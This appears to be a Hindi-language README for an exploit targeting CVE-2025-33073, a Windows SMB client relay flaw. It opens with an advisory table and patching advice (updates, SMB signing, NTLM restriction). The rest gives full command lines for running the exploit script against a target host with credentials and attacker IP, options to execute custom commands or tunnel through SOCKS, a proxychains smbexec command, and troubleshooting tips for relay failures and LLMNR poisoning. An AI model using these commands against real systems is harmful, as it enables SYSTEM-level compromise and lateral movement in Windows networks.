
CVE-2025-33073
🔥 उच्च-गंभीरता प्रमाणित दूरस्थ कोड निष्पादन 🔥 विंडोज SMB क्लाइंट में अनुचित पहुंच नियंत्रण (CWE-284)
| पहलू | विवरण |
|---|
| CVSS v3.1 स्कोर | 8.8 (उच्च) 🔥 |
| प्रभावित सिस्टम | विंडोज 10, 11, सर्वर 2012–2025 (सभी संस्करण) 💻 |
| प्रकटीकरण तिथि | 10 जून, 2025 📅 (जून 2025 पैच मंगलवार में पैच किया गया) |
| शोषण | जंगली में सक्रिय रूप से शोषित 😱 21 अक्टूबर, 2025 को CISA KEV में जोड़ा गया |
| हमला वेक्टर | नेटवर्क (प्रमाणित) 🌐 |
| प्रभाव | SYSTEM-स्तर कोड निष्पादन 👑 केरबेरोस रिले के माध्यम से पार्श्व गति |
| बाईपास | NTLM प्रतिबिंब शमन ⚡ |
अभी पैच करें! 🔧
→ माइक्रोसॉफ्ट अपडेट लागू करें (जैसे, KB5060998)
→ माइक्रोसॉफ्ट अपडेट गाइड 🔗
SMB हस्ताक्षर सक्षम करें ✍️
→ सभी क्लाइंट और सर्वर पर लागू करें
→ Set-SmbClientConfiguration -RequireSecuritySignature $true
NTLM प्रतिबंधित करें 🚫
→ जहां संभव हो NTLM को ब्लॉक करें
→ EDR टूल्स के साथ रिले प्रयासों की निगरानी करें
स्वचालित समाधान? 🤖
→ बड़े पैमाने पर सुधार के लिए Vicarius vRx या कस्टम स्क्रिप्ट का उपयोग करें
15 नवंबर, 2025 तक स्थिति:
✅ पैच किया गया
❌ अभी भी अपैच किए गए सिस्टम में शोषित
🔔 CISA समय सीमा: 10 नवंबर, 2025 ⏰
sudo python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target CLIENT01.wintastic.local --target-ip 192.168.178.65

sudo python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target CLIENT01.wintastic.local --target-ip 192.168.178.65 --cli-only

कस्टम कमांड secretsdump चलाने के बजाय एक कस्टम कमांड निष्पादित किया जा सकता है।
sudo python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target CLIENT01.wintastic.local --target-ip 192.168.178.65 --cli-only --custom-command "whoami"

SOCKS SYSTEM के रूप में वैध कनेक्शन स्थापित होने के बाद कमांड के अधिक गुप्त निष्पादन के लिए। --target और --target-ip यहां समान होना चाहिए।
python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target 192.168.178.65 --target-ip 192.168.178.65 --cli-only --socks

साथ ही, SAM डंप करने के बजाय proxychains के माध्यम से एक कस्टम कमांड चलाया जा सकता है।
proxychains nxc smb 192.168.178.65 -d '' -u '' -p '' -x 'whoami' --exec-method smbexec

यदि आप डिवाइस के समान प्रसारण डोमेन में हैं और यह LLMNR विषाक्तता के लिए संवेदनशील है, तो DNS रिकॉर्ड पंजीकृत किए बिना डिवाइस का शोषण करना संभव है।

मैंने देखा है कि कभी-कभी हमला काम नहीं करता क्योंकि हमले के लिए होस्टनाम का उपयोग किया जाता है जिसके परिणामस्वरूप Kali से DNS लुकअप होता है। यदि Kali DNS सर्वर का उपयोग नहीं कर रहा है या आपको impacket-ntlmrelayx से '/ FAILED' संदेश मिलता है, तो होस्ट को अपनी /etc/hosts फ़ाइल में जोड़ने का प्रयास करें। इससे हमला काम करना चाहिए।
यदि IP का उपयोग कर रहे हैं तो हमला काम करना चाहिए। कभी-कभी इसे कई बार चलाने से विफलता के बजाय सफलता मिल सकती है। अब तक यह पूरी तरह से स्पष्ट नहीं है कि ऐसा क्यों होता है। मुझे लगता है इसका नेटवर्किंग से कुछ संबंध है।
-M या --method का उपयोग करके कोई अन्य कर्स विधि आज़माएं।
स्थानीय NTLM प्रमाणीकरण होता है

स्थानीय NTLM प्रमाणीकरण नहीं होता जिसके परिणामस्वरूप विफल प्रयास होता है

इंतजार न करें — आज ही पैच करें! 🛑
आपके नेटवर्क की सुरक्षा इस पर निर्भर करती है। 💪